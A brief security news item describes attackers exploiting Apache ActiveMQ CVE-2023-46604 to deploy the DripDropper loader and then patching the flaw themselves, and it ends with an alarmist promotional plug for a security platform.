Attackers hijack servers with DripDropper, then seal the backdoor shut with their own patch.
Hackers are exploiting a two-year-old Apache ActiveMQ flaw (CVE-2023-46604) on Cloud Linux servers, deploying a loader called DripDropper via Dropbox. After gaining access, they patch the very vulnerability they abused, locking out rivals and obscuring their entry point. DripDropper installs persistence through cron jobs and SSH modifications, while attackers use Cloudflare tunnels and Sliver for control. Red Canary notes the rare use of PyInstaller ELF files and warns admins to scrutinize patches closely, as this “self-patching” tactic is spreading. The campaign highlights, yet again, the urgency of proactive patching and vigilant log monitoring.
–
Cloud hacking is surging, and a massive wave of cyber breaches is imminent. Ruthless AI-driven attacks are targeting your systems right now. Act immediately—secure your websites, servers, and networks before it’s too late using this amazing platform.
crebspark.com 